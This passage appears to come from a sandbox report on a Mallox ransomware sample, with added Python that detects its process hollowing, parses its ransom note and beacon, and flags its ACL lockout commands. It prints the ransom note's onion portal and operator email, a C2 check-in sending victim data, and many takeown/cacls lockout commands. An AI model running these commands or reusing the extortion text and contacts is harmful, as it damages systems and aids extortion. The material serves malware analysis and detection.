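The records above, read together with the NtAllocateVirtualMemory and WriteProcessMemory evidence earlier on this page, are one complete process-hollowing sequence against a suspended copy of AddInProcess32.exe (PID 7492): CREATE_SUSPENDED, NtGetContextThread, an RWX allocation of 176128 bytes at the image base 0x00400000, section-by-section WriteProcessMemory of a native PE (MZ/PE header with a Rich header and .text/.rdata/.data/.rsrc/.reloc sections, the asInvoker manifest landing at 0x00428000), a 4-byte write at 0x7efde008, then NtSetContextThread and NtResumeThread. On 32-bit Windows the initial thread's context carries the image entry point in eax and the PEB address in ebx, so eax = 4232103 = 0x004093A7 is the new entry point (RVA 0x93A7, inside the written region) and ebx = 2130567168 = 0x7EFDE000 is the PEB; the write at PEB+0x8 repoints the ImageBaseAddress field at the injected image (the logged "@" is the one printable byte, 0x40, of little-endian 0x00400000). The Python below is an added example, not part of the report or the sample, that reconstructs these checks from an event list transcribed from the records above; the event field names and the abbreviated buffers are the example's own assumptions.

```python
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40
PEB_IMAGE_BASE_OFFSET = 0x8   # x86 PEB: ImageBaseAddress sits at offset 8

# API records transcribed from the sandbox report into a constructed list.
# Only the fields this analysis needs are kept; buffers are cut to their printable prefix.
EVENTS = [
    {"api": "CreateProcessInternalW", "pid": 7492, "creation_flags": 0x4,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"},
    {"api": "NtGetContextThread", "pid": 7492},
    {"api": "NtAllocateVirtualMemory", "pid": 7492, "base": 0x00400000,
     "size": 176128, "protection": 0x40},
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00400000, "buffer": b"MZ"},    # PE headers
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00401000, "buffer": b""},      # section data
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00419000, "buffer": b""},
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00423000, "buffer": b""},
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00428000, "buffer": b"<?xml"}, # manifest resource
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x00429000, "buffer": b""},
    {"api": "WriteProcessMemory", "pid": 7492, "base": 0x7EFDE008,
     "buffer": (0x00400000).to_bytes(4, "little")},  # report shows only the printable "@" (0x40)
    {"api": "NtSetContextThread", "pid": 7492, "eax": 4232103, "ebx": 2130567168},
    {"api": "NtResumeThread", "pid": 7492},
]


def analyze_hollowing(events, pid):
    """Reconstruct a create-suspended / write / set-context / resume sequence for one pid."""
    ev = [e for e in events if e.get("pid") == pid]
    order = [e["api"] for e in ev]
    result = {"pid": pid, "is_hollowing": False}

    create = next((e for e in ev if e["api"] == "CreateProcessInternalW"), None)
    result["target"] = create["image"] if create else None
    result["created_suspended"] = bool(create and create["creation_flags"] & CREATE_SUSPENDED)

    region = next((e for e in ev if e["api"] == "NtAllocateVirtualMemory"
                   and e.get("protection") == PAGE_EXECUTE_READWRITE), None)
    base, size = (region["base"], region["size"]) if region else (None, 0)
    result["rwx_region"] = (base, size)

    writes = [e for e in ev if e["api"] == "WriteProcessMemory"]
    result["pe_written_at_base"] = any(
        w["base"] == base and w["buffer"].startswith(b"MZ") for w in writes)

    ctx = next((e for e in ev if e["api"] == "NtSetContextThread"), None)
    if ctx and base is not None:
        # x86 initial thread context: eax = entry point, ebx = PEB address
        result["entry_point"] = ctx["eax"]
        result["peb"] = ctx["ebx"]
        result["entry_in_region"] = base <= ctx["eax"] < base + size
        result["entry_rva"] = ctx["eax"] - base
        # The loader's idea of the image base must agree with the injected image.
        result["peb_imagebase_patched"] = any(
            w["base"] == ctx["ebx"] + PEB_IMAGE_BASE_OFFSET
            and int.from_bytes(w["buffer"], "little") == base
            for w in writes)
    else:
        result.update(entry_point=None, peb=None, entry_in_region=False,
                      entry_rva=None, peb_imagebase_patched=False)

    def before(a, b):
        return a in order and b in order and order.index(a) < order.index(b)

    result["sequence_ok"] = (before("CreateProcessInternalW", "WriteProcessMemory")
                             and before("WriteProcessMemory", "NtSetContextThread")
                             and before("NtSetContextThread", "NtResumeThread"))
    result["is_hollowing"] = (result["created_suspended"] and result["pe_written_at_base"]
                              and result["entry_in_region"] and result["sequence_ok"])
    return result


if __name__ == "__main__":
    for key, value in analyze_hollowing(EVENTS, 7492).items():
        print(f"{key}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key}: {value}")
```

The same checks apply to any sandbox or EDR trace: a suspended child, an MZ write at a fresh RWX region, a thread context whose eax lands inside that region, and a pointer-sized write at ebx+8 are together far more specific than any one of those calls on its own.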
url https://www.torproject.org/download/
Time & API Arguments Status Return Repeated

NtWriteFile

buffer: Hello
Your files are encrypted and can not be used
To return your files in work condition you need decryption tool
Follow the instructions to decrypt all your data
Do not try to change or restore files yourself, this will break them
If you want, on our site you can decrypt one file for free.
Free test decryption allowed only for not valuable file with size less than 3MB
How to get decryption tool:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field.
Your Private key: CF6C16D3AC8E9D60059208A0
5) You will see payment information and we can make free test decryption here
Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org
Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.
offset: 0
file_handle: 0x00000344
filepath: \Device\HarddiskVolume1\FILE RECOVERY.txt
1 0 0

NtWriteFile

buffer: Hello
Your files are encrypted and can not be used
To return your files in work condition you need decryption tool
Follow the instructions to decrypt all your data
Do not try to change or restore files yourself, this will break them
If you want, on our site you can decrypt one file for free.
Free test decryption allowed only for not valuable file with size less than 3MB
How to get decryption tool:
1) Download and install TOR browser by this link: https://www.torproject.org/download/
2) If TOR blocked in your country and you can't access to the link then use any VPN software
3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
4) Copy your private ID in the input field.
Your Private key: CF6C16D3AC8E9D60059208A0
5) You will see payment information and we can make free test decryption here
Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org
Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site.
offset: 0
file_handle: 0x0000033c
filepath: C:\FILE RECOVERY.txt
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestW

headers: Content-Type: application/x-www-form-urlencoded Host: whyers.io
request_handle: 0x00cc000c
post_data: user=maestro&TargetID=CF6C16D3AC8E9D60059208A0&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC&max_size_of_file=0.0&size_of_hdd=22
1 1 0

(the same HttpSendRequestW call, with identical headers, request handle 0x00cc000c and POST body, is recorded 19 more times: 20 check-ins to whyers.io in total, all with status 1)
file C:\Users\test22\AppData\Local\Temp\rxtygf.exe\:Zone.Identifier
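The two FILE RECOVERY.txt writes and the whyers.io check-in above carry the same victim identifier: the note's "Private key: CF6C16D3AC8E9D60059208A0" and the POST body's TargetID=CF6C16D3AC8E9D60059208A0. The SystemInformation field packs OS edition, country code, public IP and hostname into one comma-separated, URL-encoded value, and the note supplies the operator's contact channels (a v3 onion portal with a per-victim sign-in path, the same onion as a leak blog, and a fallback mailbox). The Python below is an added example, not part of the report or the sample: it extracts the contact channels and victim ID from the note, decodes the form body, and confirms the two IDs agree. The note text and POST body are transcribed from the records above; the regular expressions, field names and the split of SystemInformation into four parts are the example's own assumptions.

```python
import re
from urllib.parse import parse_qs

# Ransom note as written to FILE RECOVERY.txt in the report above (transcribed, whitespace normalised).
RANSOM_NOTE = (
    "Hello Your files are encrypted and can not be used To return your files in work condition "
    "you need decryption tool Follow the instructions to decrypt all your data Do not try to change "
    "or restore files yourself, this will break them If you want, on our site you can decrypt one "
    "file for free. Free test decryption allowed only for not valuable file with size less than 3MB "
    "How to get decryption tool: 1) Download and install TOR browser by this link: "
    "https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to "
    "the link then use any VPN software 3) Run TOR browser and open the site: "
    "wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin "
    "4) Copy your private ID in the input field. Your Private key: CF6C16D3AC8E9D60059208A0 "
    "5) You will see payment information and we can make free test decryption here "
    "Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion "
    "If you are unable to contact us through the site, then you can email us: "
    "mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. "
    "Do not use it if you have not tried contacting through the site."
)

# Host header and POST body from the HttpSendRequestW records above (transcribed).
BEACON_HOST = "whyers.io"
BEACON_BODY = ("user=maestro&TargetID=CF6C16D3AC8E9D60059208A0"
               "&SystemInformation=Windows%207%20Professional%20N%20x64,%20KR,%20175.208.134.152,%20TEST22-PC"
               "&max_size_of_file=0.0&size_of_hdd=22")

ONION_RE = re.compile(r"\b([a-z2-7]{16,56}\.onion)(/\S*)?")      # v2 (16) and v3 (56) addresses
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"https?://\S+")
VICTIM_ID_RE = re.compile(r"Private key:\s*([0-9A-Fa-f]{16,})")   # label as used in this note


def extract_note_iocs(note):
    """Pull contact channels and the per-victim ID out of a ransom note."""
    onion_matches = list(ONION_RE.finditer(note))
    match = VICTIM_ID_RE.search(note)
    return {
        "victim_id": match.group(1).upper() if match else None,
        "onion_hosts": sorted({m.group(1) for m in onion_matches}),
        "onion_urls": sorted({m.group(1) + (m.group(2) or "") for m in onion_matches}),
        "emails": sorted(set(EMAIL_RE.findall(note))),
        "clearnet_urls": sorted(set(URL_RE.findall(note))),
    }


def parse_beacon(body, host=BEACON_HOST):
    """Decode the x-www-form-urlencoded check-in and split its SystemInformation field."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    sysinfo = [part.strip() for part in form.get("SystemInformation", "").split(",")]
    os_name, country, public_ip, hostname = (sysinfo + [None] * 4)[:4]
    return {
        "c2_host": host,
        "user": form.get("user"),
        "target_id": form.get("TargetID"),
        "os": os_name, "country": country, "public_ip": public_ip, "hostname": hostname,
        "max_size_of_file": form.get("max_size_of_file"),
        "size_of_hdd": form.get("size_of_hdd"),
    }


def correlate(note, body, host=BEACON_HOST):
    """Confirm the ID shown to the victim is the one reported to the operator."""
    iocs = extract_note_iocs(note)
    beacon = parse_beacon(body, host)
    return {"note": iocs, "beacon": beacon,
            "ids_match": iocs["victim_id"] is not None and iocs["victim_id"] == beacon["target_id"]}


if __name__ == "__main__":
    for key, value in correlate(RANSOM_NOTE, BEACON_BODY).items():
        print(key, value)
```

Matching the ID in the note against the ID in the beacon ties a recovered note on disk to a specific check-in in proxy logs, which is what lets an incident responder confirm that a given host actually reported in rather than only being dropped a note.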
Process injection Process 1680 resumed a thread in remote process 7492
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000004d4
suspend_count: 1
process_identifier: 7492
1 0 0
cmdline cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\net.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Users\Public /e /d "network service"
cmdline cacls C:\Windows\system32\net1.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline cacls C:\Users\Public /g Administrators:f
cmdline cacls C:\Windows\system32\FTP.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\wscript.exe /e /d system
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline cacls C:\ProgramData /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
cmdline cacls C:\Windows\system32\wscript.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\wscript.exe /e /d "network service"
cmdline cacls C:\Windows\system32\FTP.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\net1.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
cmdline cacls C:\Users\Public /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
cmdline cacls C:\Users\Public /e /d system
cmdline cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cscript.exe /e /d SERVICE
cmdline cacls C:\ProgramData /e /d system
cmdline cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline cacls C:\Windows\system32\FTP.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net1.exe /e /g Users:r
cmdline cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\net1.exe /e /d "network service"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\cscript.exe /e /g Users:r
cmdline cacls C:\Users\Public /e /d mssql$sqlexpress
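The takeown and cacls lines listed under the three signature hits above follow one pattern per target (cmd.exe, powershell.exe, mshta.exe, net.exe, net1.exe, cscript.exe, wscript.exe and FTP.exe in both system32 and SysWOW64, plus C:\Users\Public and C:\ProgramData): `takeown /f <path> /a` hands ownership to the Administrators group, a plain `cacls <path> /g Administrators:f` without /e replaces the whole DACL rather than editing it, and the following `/e` passes re-add Users and Administrators read access while denying SERVICE, "network service", system and the SQL Server service accounts mssqlserver and mssql$sqlexpress. The effect is that anything running under those service identities can no longer read or execute the tools, and the paired `reg delete ... Command Processor /v AutoRun` removes any cmd.exe AutoRun hook before the batch of commands runs. The Python below is an added detection example, not part of the report or the sample: it folds Sysmon/EDR-style command lines into one record per target, flags the lockout pattern and the AutoRun deletion, and distinguishes system binaries from other paths. The embedded command lines are a transcribed subset of those above plus one constructed benign line; the service-principal list and system-directory prefixes are the example's assumptions.

```python
import re
from dataclasses import dataclass, field

# Principals whose denial locks services (including SQL Server) out of the target. Assumed list.
SERVICE_PRINCIPALS = {"system", "service", "network service", "local service",
                      "mssqlserver", "mssql$sqlexpress"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Command lines transcribed from the sandbox report (a constructed subset),
# plus one constructed benign line that must not be flagged.
SAMPLE_CMDLINES = [
    r'takeown /f C:\Windows\system32\cmd.exe /a',
    r'cacls C:\Windows\system32\cmd.exe /g Administrators:f',
    r'cacls C:\Windows\system32\cmd.exe /e /g Users:r',
    r'cacls C:\Windows\system32\cmd.exe /e /g Administrators:r',
    r'cacls C:\Windows\system32\cmd.exe /e /d SERVICE',
    r'cacls C:\Windows\system32\cmd.exe /e /d mssqlserver',
    r'cacls C:\Windows\system32\cmd.exe /e /d "network service"',
    r'cacls C:\Windows\system32\cmd.exe /e /g system:r',
    r'cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress',
    r'takeown /f C:\Windows\SysWOW64\mshta.exe /a',
    r'cacls C:\Windows\SysWOW64\mshta.exe /e /d system',
    r'cacls C:\Users\Public /e /d "network service"',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f',
    r'C:\Windows\system32\cmd.exe /S /D /c" echo y"',
    r'cacls C:\Users\test22\Documents\notes.txt /e /g test22:r',   # constructed benign ACL edit
]

_TOKEN = re.compile(r'"[^"]*"|\S+')


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping "quoted strings" whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


@dataclass
class AclChange:
    path: str
    owner_taken: bool = False                    # takeown /f <path> seen
    dacl_replaced: bool = False                  # cacls without /e overwrites the whole DACL
    grants: list = field(default_factory=list)   # (principal, perm) in the order applied
    denies: set = field(default_factory=set)     # principals given a deny ACE


def parse_acl_commands(cmdlines):
    """Fold takeown/cacls lines into one AclChange per target; collect other notable lines."""
    changes, notes = {}, []
    for cmdline in cmdlines:
        toks = tokenize(cmdline)
        if not toks:
            continue
        low = [t.lower() for t in toks]
        if low[0] == "takeown" and "/f" in low[:-1]:
            path = low[low.index("/f") + 1]
            changes.setdefault(path, AclChange(path)).owner_taken = True
        elif low[0] == "cacls" and len(low) > 1:
            path = low[1]
            change = changes.setdefault(path, AclChange(path))
            if "/e" not in low:
                change.dacl_replaced = True
            for i, tok in enumerate(low[2:], start=2):
                if tok == "/g" and i + 1 < len(low):
                    principal, _, perm = low[i + 1].partition(":")
                    change.grants.append((principal, perm))
                elif tok == "/d" and i + 1 < len(low):
                    change.denies.add(low[i + 1])
        elif (low[:2] == ["reg", "delete"] and "autorun" in low
              and any(t.endswith("command processor") for t in low)):
            notes.append("cmd.exe AutoRun value deleted: " + cmdline)
    return changes, notes


def find_lockouts(changes):
    """Flag targets where a service principal is denied or ownership/DACL was seized."""
    findings = []
    for path, c in sorted(changes.items()):
        denied_services = c.denies & SERVICE_PRINCIPALS
        if not (denied_services or c.owner_taken or c.dacl_replaced):
            continue
        findings.append({
            "path": path,
            "system_binary": path.startswith(SYSTEM_DIRS),
            "owner_taken": c.owner_taken,
            "dacl_replaced": c.dacl_replaced,
            "denied_services": sorted(denied_services),
        })
    return findings


if __name__ == "__main__":
    changes, notes = parse_acl_commands(SAMPLE_CMDLINES)
    for finding in find_lockouts(changes):
        print(finding)
    for note in notes:
        print(note)
```

Grouping by target matters more than matching single lines: one `cacls /e /d` on its own is routine administration, while takeown followed by a DACL replacement and a run of deny ACEs for service accounts against a system binary is the sequence worth alerting on. Restoring the affected binaries afterwards means resetting ownership to TrustedInstaller and the DACL to the defaults, not just removing the deny entries.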
registry HKEY_LOCAL_MACHINE\SOFTWARE\VMware, Inc.\VMware VGAuth
Lionic Trojan.Win32.Generic.4!c
Elastic malicious (high confidence)
FireEye Generic.mg.ad607f046a6f855f
McAfee Artemis!AD607F046A6F
Cylance unsafe
Sangfor Trojan.Win32.Agent.Vtuo
Symantec ML.Attribute.HighConfidence
tehtris Generic.Malware
Cynet Malicious (score: 100)
APEX Malicious
Kaspersky UDS:DangerousObject.Multi.Generic
Avast TrojanX-gen [Trj]
McAfee-GW-Edition BehavesLike.Win32.Generic.fh
Trapmine malicious.moderate.ml.score
Webroot W32.Trojan.Gen
Microsoft Trojan:Win32/Casdet!rfn
ZoneAlarm UDS:DangerousObject.Multi.Generic
Google Detected
BitDefenderTheta Gen:NN.ZemsilF.36318.ym0@aWl!rFc
Panda Trj/Genetic.gen
Ikarus Trojan-Spy.Keylogger.Snake
MaxSecure Trojan.Malware.300983.susgen
Fortinet MSIL/Kryptik.KBT!tr
AVG TrojanX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x00000198
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x000003f8
suspend_count: 1
process_identifier: 1680
1 0 0

CreateProcessInternalW

thread_identifier: 2456
thread_handle: 0x00000480
process_identifier: 2452
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Users\Public\Pictures\Kill-Delete.bat"
filepath_r:
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004a0
1 1 0

NtResumeThread

thread_handle: 0x0000044c
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x000004b4
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x000003f8
suspend_count: 1
process_identifier: 1680
1 0 0

NtResumeThread

thread_handle: 0x000004c0
suspend_count: 1
process_identifier: 1680
1 0 0

CreateProcessInternalW

thread_identifier: 7496
thread_handle: 0x000004d4
process_identifier: 7492
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
track: 1
command_line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000004d8
1 1 0

NtGetContextThread

thread_handle: 0x000004d4
1 0 0

NtAllocateVirtualMemory

process_identifier: 7492
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004d8
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00419000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00423000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer: €0€ H`€}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00428000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00429000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4232103
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004d4
process_identifier: 7492
1 0 0

NtResumeThread

thread_handle: 0x000004d4
suspend_count: 1
process_identifier: 7492
1 0 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000088
process_identifier: 2528
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\reg.exe
track: 1
command_line: reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
filepath_r: C:\Windows\system32\reg.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2576
thread_handle: 0x00000084
process_identifier: 2572
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\takeown.exe
track: 1
command_line: takeown /f C:\Windows\system32\cmd.exe /a
filepath_r: C:\Windows\system32\takeown.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 2624
thread_handle: 0x0000008c
process_identifier: 2620
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2660
thread_handle: 0x00000084
process_identifier: 2656
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /g Administrators:f
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2716
thread_handle: 0x00000094
process_identifier: 2712
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2752
thread_handle: 0x0000008c
process_identifier: 2748
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g Users:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2808
thread_handle: 0x00000084
process_identifier: 2804
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2844
thread_handle: 0x00000094
process_identifier: 2840
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2904
thread_handle: 0x0000008c
process_identifier: 2900
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2940
thread_handle: 0x00000084
process_identifier: 2936
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d SERVICE
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2996
thread_handle: 0x00000094
process_identifier: 2992
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 3032
thread_handle: 0x0000008c
process_identifier: 3028
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
